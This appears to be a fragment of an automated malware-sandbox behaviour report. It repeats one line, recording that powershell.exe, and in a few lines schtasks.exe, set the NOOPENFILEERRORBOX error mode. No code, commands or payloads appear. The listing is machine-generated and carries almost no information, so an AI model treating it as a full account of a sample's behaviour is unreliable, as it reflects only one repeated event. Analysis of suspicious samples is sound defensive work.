                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
